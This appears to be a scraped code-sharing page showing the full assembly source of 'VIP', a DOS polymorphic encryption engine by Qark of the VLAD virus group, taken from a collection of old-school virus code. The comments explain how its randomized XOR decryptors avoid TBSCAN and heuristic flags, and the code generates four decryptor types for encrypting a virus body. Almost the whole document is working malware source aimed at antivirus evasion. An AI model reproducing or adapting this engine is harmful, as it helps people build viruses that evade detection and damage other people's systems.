vip10.asm
来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 426 行
ASM
426 行
;
; VLAD Infinite Polymorphic - VIP
; by Qark - VLAD
;
; This engine is good in some respects, and poor in others.
; The encryption it creates is fairly easy to crack, being a looping
; xor with a keychange (all registers/values chosen at random),
; but the encryption loops are very hard to detect. There are four
; different loop types, of which TBSCAN can only find two.
;
; At the start of the decryptor, the engine won't produce some instructions
; that flag heuristics. For this reason, VIP avoids alot of the heuristic
; problems most other garbage generators have. For example:
; Doesn't produce INC/DEC in the first 20 bytes to avoid flags.
; Doesn't produce memory operations in the first 10 bytes.
; Doesn't produce XCHG in the first 10 bytes.
; Always uses the short version of instructions (AX/AL Imm etc)
;
; One problem that couldn't be avoided is the creation of FFFF word pointers
; causing crashes. The likelihood of them occurring is low (about 1 in 300
; samples) because danger instructions have been put to a minimum.
; (eg mov ax,[bx-1] bx=0, isn't produced anymore).
;
; If you're wondering why the polymorphism produced isn't changing, that's
; because it's an example of slow polymorphism.
;
; To assemble, use it as an include file for the program that calls it.
;
VIP:
;On entry:
; AL = 1 if COM file
; DS:SI = Points to the unencrypted virus
; ES:DI = Place to store encrypted virus
; CX = length of virus
; BP = delta offset
; Assumes CS=DS=ES
;On return:
; CX = length of decryptor + encrypted code
cld
mov word ptr saved_cx,cx
mov word ptr saved_di,di
mov word ptr saved_si,si
mov byte ptr segtype,al
mov byte ptr inloop,0 ;Initialise variable
;Initialise our randomisation for slow polymorphism.
call init_rand
;Clear the register table
call unmark_all
;Clear the displacements
call clear_displacement
;Select a random decryption type.
rand_routine:
call get_rand
mov si,offset dec_type
and ax,3*2
add si,ax
mov ax,word ptr [si]
jmp ax
Standard:
;Uses 'standard' encryption.
; ----This is a basic layout of the decryptor----
; mov pointer,offset virus_start
; mov cipher,xorval
; loop:
; xor word ptr pointer,cipher
; inc pointer
; inc pointer
; cmp pointer,virus_start+virlength
; jne loop
; virus_start:
; -----------------------------------------------
call startup ;Setup pointer and cipher
mov byte ptr inloop,1
mov word ptr loopstart,di
call encrypt_type
or al,0f8h
mov ah,al
mov al,81h ;CMP pointer,xxxx
stosw
call round_up
add ax,word ptr pointer1val
stosw
call handle_jne ;JNE xx
call calc_jne
mov byte ptr inloop,0
;Calculate the displacement
call fix_displacements
call encrypt_virus
call decryptor_size
ret
Stack1:
;Use the stack method for encryption. This method doesnt work on EXE's
;because SS <> CS.
; ----This is a basic layout of the decryptor----
; mov sp,offset virus_start
; mov cipher,xor_val
; loop:
; pop reg
; xor reg,cipher
; push reg
; pop randomreg
; cmp sp,virus_start+virus_length
; jne loop
; -----------------------------------------------
cmp byte ptr segtype,0
jne stack1_ok
jmp rand_routine
stack1_ok:
call rand_garbage
call rand_garbage
mov al,0bch ;MOV SP,xxxx
stosb
mov word ptr displace,di
mov ax,bp
stosw
call setup_cipher
mov byte ptr inloop,1
mov word ptr loopstart,di
call select_reg
call rand_garbage
push ax
or al,58h ;POP reg
stosb
call rand_garbage
mov al,33h ;XOR reg,reg
stosb
pop ax
push ax
push cx
mov cl,3
shl al,3
or al,byte ptr cipher
or al,0c0h
stosb
pop cx
call rand_garbage
pop ax
or al,50h ;PUSH reg
stosb
call rand_garbage
next_pop:
call get_rand
call check_reg
jc next_pop
and al,7
or al,58h ;POP reg (=add sp,2)
stosb
call rand_garbage
mov ax,0fc81h ;CMP SP,xxxx
stosw
mov word ptr displace2,di
call round_up
add ax,bp
stosw
call handle_jne
call calc_jne
mov byte ptr inloop,0
mov al,0bch ;mov sp,0fffeh
stosb
mov ax,0fffeh
stosw
call rand_garbage
;Calculate the displacement
call fix_displacements
mov si,word ptr saved_si
mov cx,word ptr saved_cx
inc cx
shr cx,1
mov bx,word ptr xorval
enc_stack1:
lodsw
xor ax,bx
stosw
loop enc_stack1
call decryptor_size
ret
Call_Enc:
;Uses recursive calls to decrypt the virus. Needs a big stack or else it will
;crash.
; ----This is a basic layout of the decryptor----
; mov pointer,offset virus_start
; mov cipher,xorval
; loop:
; cmp pointer,virus_start+virus_length
; jne small_dec
; ret
; small_dec:
; xor word ptr pointer,cipher
; inc pointer
; inc pointer
; call loop
; add sp,virus_length-2
; -----------------------------------------------
call startup
mov byte ptr inloop,1
mov word ptr loopback,di
call rand_garbage
mov al,byte ptr pointer
or al,0f8h
mov ah,al
mov al,81h ;CMP pointer,xxxx
stosw
call round_up
add ax,word ptr pointer1val
stosw
call handle_jne
mov word ptr loopf,di
stosb
call rand_garbage
mov al,0c3h ;RET
stosb
call rand_garbage
mov ax,di ;Fix the JNE.
mov si,word ptr loopf
inc si
sub ax,si
dec si
mov byte ptr [si],al
call encrypt_type
mov al,0e8h ;CALL xxxx
stosb
mov ax,di
inc ax
inc ax
sub ax,word ptr loopback
neg ax
stosw
mov byte ptr inloop,0
call rand_garbage
mov ax,0c481h
stosw
mov ax,word ptr saved_cx
dec ax
dec ax
stosw
call rand_garbage
;Calculate the displacement
call fix_displacements
call encrypt_virus
call decryptor_size
ret
Call_Enc2:
;Decrypts the virus from within a call.
; ----This is a basic layout of the decryptor----
; mov pointer,offset virus_start
; mov cipher,xorval
; call decrypt
; jmp short virus_start
; decrypt:
; xor pointer,cipher
; inc pointer
; inc pointer
; cmp pointer,virus_start+viruslength
; jne decrypt
; ret
; -----------------------------------------------
call startup
mov byte ptr inloop,1
mov al,0e8h ;CALL xxxx
stosb
stosw
mov word ptr loopf16,di
call rand_garbage
mov al,0e9h ;JMP xxxx
stosb
mov word ptr displace2,di
; mov ax,di
; inc ax
; inc ax
; sub ax,saved_di
; neg ax
stosw
call rand_garbage
call rand_garbage
mov ax,di
mov si,word ptr loopf16
sub ax,si
mov word ptr [si-2],ax
mov word ptr loopstart,di
call encrypt_type
or al,0f8h
mov ah,al
mov al,81h ;CMP pointer,xxxx
stosw
call round_up
add ax,word ptr pointer1val
stosw
call handle_jne
call calc_jne
mov al,0c3h ;ret
stosb
mov byte ptr inloop,0
call rand_garbage
mov ax,di
mov si,word ptr displace2
sub ax,si
dec ax
dec ax
mov [si],ax
mov word ptr displace2,0
call rand_garbage
;Calculate the displacement
call fix_displacements
call encrypt_virus
call decryptor_size
ret
db 'VIP V1.0 by Qark/VLAD'
;All the different encryption types
dec_type dw offset stack1
dw offset call_enc
dw offset call_enc2
dw offset standard
segtype db 0 ;1 if com file
saved_cx dw 0 ;the initial CX
saved_di dw 0 ;the initial DI
saved_si dw 0
displace dw 0
displace2 dw 0
dw 0
displaceb dw 0
inloop db 0 ;=1 if inside a loop else 0
;if set no 'word ptr' instructions made
loopstart dw 0 ;for backwards 8 bit
loopf dw 0 ;for forwards 8 bit
loopback dw 0 ;backwards 16 bit
loopf16 dw 0 ;forwards 16 bit
xorval dw 0
cipher db 0
r_m db 0 ;The r-m of the pointer
;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?